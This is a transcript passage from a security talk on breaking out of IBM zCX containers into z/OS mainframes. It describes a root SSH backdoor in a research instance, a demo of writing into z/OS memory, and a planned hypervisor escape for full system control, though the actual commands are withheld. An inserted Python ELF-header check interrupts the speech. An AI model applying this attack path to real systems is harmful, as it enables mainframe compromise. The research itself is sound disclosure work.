34:02 - They are the same thing. In open-source parlance, s390x equals zArchitecture.
34:08 - And even though I have things like (indistinct) and GDB and that sort of thing, when I disassemble these binaries, I’m gonna end up with z Assembler code, not x86, not AMD, but z Assembler code.
34:20 - So this is gonna make it quite a bit more complicated to get through, but doing this I think is gonna open up some obvious pointers to other security vulnerabilities.
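One concrete consequence of s390x being its own target: you can spot it right in an ELF file header, where the `e_machine` field is 22 (EM_S390) and the data encoding is big-endian. A small sketch (the fabricated header bytes are just for illustration):

```python
import struct

EM_S390 = 22  # ELF e_machine value shared by s390 and s390x

def is_s390x_elf(header: bytes) -> bool:
    """Check an ELF header for a 64-bit, big-endian, s390 binary."""
    if header[:4] != b"\x7fELF":
        return False
    ei_class, ei_data = header[4], header[5]
    if ei_class != 2 or ei_data != 2:   # ELFCLASS64, ELFDATA2MSB (big-endian)
        return False
    # e_machine lives at byte offset 18, encoded big-endian per ei_data.
    (e_machine,) = struct.unpack_from(">H", header, 18)
    return e_machine == EM_S390

# A fabricated 20-byte header prefix: magic, 64-bit class, big-endian,
# version 1, padding, e_type, then e_machine = 0x0016 = 22.
fake = b"\x7fELF" + bytes([2, 2, 1]) + b"\x00" * 9 + b"\x00\x02" + b"\x00\x16"
print(is_s390x_elf(fake))  # → True
```

The big-endian encoding is exactly what trips up tooling that quietly assumes little-endian x86, often several layers down the stack.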
34:30 - - The s390x architecture kept coming up and kept kinda throwing wrenches at things throughout this process, because open source tooling sometimes supports s390x, but a lot of the time it doesn’t, and honestly, for understandable reasons.
34:44 - Open source developers, who are often working for free, are like, “I don’t work for IBM, why would I work on something that is specific to IBM architecture? They’re not paying me to do this.
34:55 - If you want people to do this, you can hire people to do this.” And therefore, a lot of tools just aren’t supported.
35:01 - That kept coming up as I kept running into, like, okay, I’m going to go get this open source tool that I’m used to using, and having it go, no, with some sort of terrible architecture failure seven layers down the stack.
35:11 - It was kinda cool for learning and also a pain in the ass.
35:14 - Anyway, the real goal here for us would be a full hypervisor escape, which we believe can be done.
35:22 - zCX runs in an address space within z/OS, and that address space runs as authorized.
35:28 - Let me explain what this means. In a mainframe context, running as authorized means something specific.
35:34 - It’s like security through the filesystem. Imagine a folder on Linux where anything that was in that folder automatically ran as UID zero, as root, and not only that, it had root access to everything else in the system; that’s actually how mainframe authorized address spaces work, which is wild.
35:54 - And what this means is that if we can get code execution in that address space, which frankly, we believe that we can, we will be able to own the entire mainframe server, all of it, everything.
36:05 - We already know that there are direct memory links.
36:08 - IBM helpfully provided us this hideously ugly diagram in Comic Sans telling us so, and we also know because of this demo.
36:19 - - Okay. Just gonna show you a quick demo on what we think might be possible in the future.
36:23 - We’ve done a little research on the shared memory links between zCX and z/OS.
36:29 - We know they exist; they’re in some of the diagrams, and the documentation talks about them, but we found one particular instance we’d like to show you now.
36:35 - So this demo is basically just giving you kind of a window into what might be possible by way of just kind of a fun demonstration.
36:45 - So we log into our backdoor of our zCX instance. This is an SSH server that I booted up that’s just running at the root level of the zCX instance now; no more bothering to go back in through Docker and escape down to the root instance, we’re just running an SSH daemon directly from it to get in and out as part of our research environment.
37:07 - And I’m gonna run some hackery commands from the zCX instance that I’m not gonna show today.
37:12 - And just to give you an example of what we think is possible, let’s log back into the mainframe system.
37:17 - So I’m gonna go log in with my TSO ID onto our mainframe.
37:25 - And once I’m into TSO, I’m gonna launch ISPF, which is kind of the green screen that everybody associates with mainframe, and is still probably the primary means of accessing the mainframe. I’m gonna go into SDSF, which is where all the output for all the jobs is stored, and look at one of our active jobs, which is named Moon, the zCX server that we’re looking at.
37:48 - So if I scroll down in this job log and I go all the way down to the bottom, you can see that there is definitely a connection between the commands that I just executed in zCX, and my ability to write to memory inside of z/OS.
38:02 - I’m placing the goose there at the end of that job log.
38:05 - So the demonstration here was basically just to show you that what we’ve done is we’ve gone down through the Docker Engine, into the root Linux container, which is labeled here as Linux Kernel.
38:17 - And we know there are memory connections between that kernel, through the zCX hypervisor, and z/OS.
38:23 - And so our next project is really to try to figure out how to take advantage of that, do memory overwrites, and then gain full access to an authorized address space within z/OS.
38:34 - Doing so will give us access to then all of the data, the programs and everything running on z/OS, which is ultimately, the end goal.
38:45 - We couldn’t wrap this up without discussing what we’ve learned.
38:49 - None of this or any of the future work that we will do would be possible without the sparkling partnership between Ian and myself.
38:57 - And I have to add a side note that I think I’ve said sparkling in this talk more than I’ve ever said it in my entire life when I wasn’t ordering a drink.
39:02 - - It’s all glitter (indistinct). - It is indeed, there’s a lot of glitter.
39:06 - Here’s what I learned. In my niche world, I’m often the expert that people come to for input.
39:11 - I liked this, I worked hard for it. I like the recognition that comes with this.
39:15 - I admit, I find it hard to ask for help or admit that I don’t really know where to start on a thing, especially if it’s something that I could probably figure out on my own eventually, but maybe it would take me six months or a year.
39:31 - I don’t know if this resonates with any of you, but collaborating on a thing like this means sharing the spotlight, right? Letting somebody else guide you and being humble.
39:41 - This is hard. This is hard for me, and maybe it’s hard for some of you, but it’s been a really good experience.
39:48 - It’s been really good for me. I’d like to encourage all of you watching this to do this too.
39:54 - Be vulnerable, ask for help, be humble, even when it’s hard.
39:59 - It’s not only okay, but the outcome can and likely will be better than going it alone.
40:06 - - I’ve learned too. I’m more used to asking for help.
40:10 - I work collaboratively a lot. I’m a member of a hacker crew called SIG-Honk, greets Honk, and so we worked together all the time and admit when we don’t know things and ask for help and do that a lot.
40:22 - So I was more used to that. What I wasn’t used to was working with people who have a skillset that overlaps a little with mine.
40:30 - ‘Cause usually when I do collaborative work, I do it with other container people, and it’s been really awesome to get to work with somebody who has knowledge that is so new to me and is so different from mine.
40:41 - I’ve gotten to learn so much from you and it’s been great.
40:43 - And I felt really inspired by that, I think we both have, about what kinds of possibilities this could lead to for people, because we don’t always think about this, right? We hang out with people in our bubble; maybe they do the same kinds of things we do.
40:58 - Maybe they’re a lot like us, and if we start working more closely with people who are really different from us, either in just their skillset or just in the way that they are, the way that they grew up, the way that they live, you can learn a whole lot from doing that in a way that is really awesome.
41:15 - And if we all start doing that more, we can learn more from each other, and we can build and break things more amazingly, things that wouldn’t have been possible before, if we can work across chasms in that way.
41:29 - So that’s been really sweet and we want to encourage you all to do that too, because what can you do together? What can you build? What can you break? There are infinite possibilities and we really want to see what you can do with that.
41:43 - We want to see what we all do with that. I don’t think we do it enough as an industry.
41:48 - So let’s find each other. Let’s make things happen.
41:51 - You and a small crew of committed friends can change the world.
41:55 - The secret is to really begin. Thank you.
42:00 - - Thank you.